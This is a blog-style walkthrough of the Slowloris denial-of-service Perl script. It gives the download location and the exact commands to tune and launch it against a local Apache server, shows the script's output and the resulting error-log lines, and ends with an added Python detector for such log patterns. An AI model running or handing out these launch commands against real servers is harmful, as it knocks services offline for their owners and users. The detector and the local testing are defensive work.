Testing DoS with Slowloris

Slowloris, which translates into Spanish as 'loris perezoso', is no longer just that little animal that looks like a teddy bear and makes you want to hug it; it is also a Perl script that causes a DoS on some kinds of web servers.

You can find it at http://ha.ckers.org/slowloris/ and even on Wikipedia :-):

Slow loris

From Wikipedia, the free encyclopedia

For the denial of service attack, see Slowloris.

The slow loris is any one of three species of loris classified in the genus Nycticebus. These slow moving….

The script relies on the number of requests a web server is able to keep open concurrently.

What it does is saturate the service pool by opening HTTP (and HTTPS) requests and then sending header after header to the server, forcing it to keep those connections open. Web servers have a global maximum number of allowed sockets (set in the corresponding configuration files); once that number is exceeded, the web service stops responding.

To check this, we run the script against an Apache 2.x server locally.

First we download the aforementioned script and take a look at its perldoc. It tells us we can start by testing what the best timeout for the server would be:

# perl slowloris.pl -dns localhost -test -port 80

Defaulting to a 5 second tcp connection timeout.
Multithreading enabled.
This test could take up to 14.3666666666667 minutes.
Connection successful, now comes the waiting game...
Trying a 2 second delay:
Worked.
Trying a 30 second delay:
Worked.
Trying a 90 second delay:
Worked.
Trying a 240 second delay:
Worked.
Trying a 500 second delay:
Worked.
Remote server closed socket.
Use 500 seconds for -timeout.

Good, we have the timeout. Now all that is left is launching the attack:

# perl slowloris.pl -dns localhost -port 80 -timeout 500 -num 5000 -tcpto 5

Welcome to Slowloris - the low bandwidth, yet greedy and poisonous HTTP client

Multithreading enabled.
Connecting to localhost:80 every 500 seconds with 5000 sockets:
Building sockets.
Sending data.
Current stats: Slowloris has now sent 250 packets successfully.
This thread now sleeping for 500 seconds...

Building sockets.
Building sockets.
Sending data.
Current stats: Slowloris has now sent 635 packets successfully.
This thread now sleeping for 500 seconds...

Building sockets.
Sending data.
Current stats: Slowloris has now sent 776 packets successfully.
This thread now sleeping for 500 seconds...

Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
Building sockets.
….
Building sockets.

Sending data.
Current stats: Slowloris has now sent 1098 packets successfully.
This thread now sleeping for 500 seconds...

Sending data.
Current stats: Slowloris has now sent 1348 packets successfully.
This thread now sleeping for 500 seconds...

Sending data.
Current stats: Slowloris has now sent 1645 packets successfully.
This thread now sleeping for 500 seconds...

Sending data.
Current stats: Slowloris has now sent 1831 packets successfully.
This thread now sleeping for 500 seconds...

Sending data.
Current stats: Slowloris has now sent 1842 packets successfully.
This thread now sleeping for 500 seconds...

And we verify that our web server has indeed gone down:

Finally, we take a look at the Apache web server's error.log:

[Fri Aug 28 13:33:43 2009] [error] [client 127.0.0.1] request failed: error reading the headers
[Fri Aug 28 13:43:51 2009] [error] server reached MaxClients setting, consider raising the MaxClients setting
[Fri Aug 28 13:48:47 2009] [error] [client 127.0.0.1] request failed: error reading the headers
[Fri Aug 28 13:48:47 2009] [error] [client 127.0.0.1] request failed: error reading the headers
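
The error.log lines above are also what a defender can watch for. As an added example (not part of the original post), the following Python detector parses Apache 2.x error.log lines in the format shown, records when the "reached MaxClients" message appears, and flags any client whose "error reading the headers" failures pile up inside a sliding time window; the sample lines are constructed from those above plus an unrelated one, and the window and threshold values are assumed tuning knobs, not Apache settings.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Apache 2.x error.log line as it appears in the post: [timestamp] [level] [client ip] message
LINE_RE = re.compile(
    r"^\[(?P<ts>[^\]]+)\] \[(?P<level>\w+)\] (?:\[client (?P<client>[^\]]+)\] )?(?P<msg>.*)$"
)
TS_FORMAT = "%a %b %d %H:%M:%S %Y"

# Constructed sample: the four lines from the post plus one harmless line from another client.
SAMPLE_LOG = """\
[Fri Aug 28 13:33:43 2009] [error] [client 127.0.0.1] request failed: error reading the headers
[Fri Aug 28 13:43:51 2009] [error] server reached MaxClients setting, consider raising the MaxClients setting
[Fri Aug 28 13:48:47 2009] [error] [client 127.0.0.1] request failed: error reading the headers
[Fri Aug 28 13:48:47 2009] [error] [client 127.0.0.1] request failed: error reading the headers
[Fri Aug 28 13:50:02 2009] [error] [client 192.0.2.10] File does not exist: /var/www/favicon.ico
""".splitlines()


def parse_line(line):
    """Return (timestamp, level, client or None, message), or None if the line does not match."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FORMAT)
    return ts, m.group("level"), m.group("client"), m.group("msg")


def detect_slow_header_pressure(lines, window=timedelta(minutes=20), threshold=3):
    """Single pass over the log. Flags a client the first time it accumulates
    `threshold` header-read failures within `window` (assumed values), and
    records the first time Apache reported hitting MaxClients."""
    recent = defaultdict(deque)   # client -> timestamps of header failures still inside the window
    flagged = {}                  # client -> timestamp at which the threshold was crossed
    max_clients_at = None
    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        ts, _level, client, msg = parsed
        if "reached MaxClients" in msg and max_clients_at is None:
            max_clients_at = ts
        if client and "error reading the headers" in msg:
            q = recent[client]
            q.append(ts)
            while q and ts - q[0] > window:   # drop failures older than the window
                q.popleft()
            if len(q) >= threshold and client not in flagged:
                flagged[client] = ts
    return {"flagged_clients": flagged, "max_clients_at": max_clients_at}
```

On the sample, 127.0.0.1 is flagged at 13:48:47 and MaxClients is recorded at 13:43:51; in a real deployment the window and threshold must be tuned against the server's normal header-failure rate, since a few such errors are routine.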

Taken from http://unlugarsinfin.blogspot.es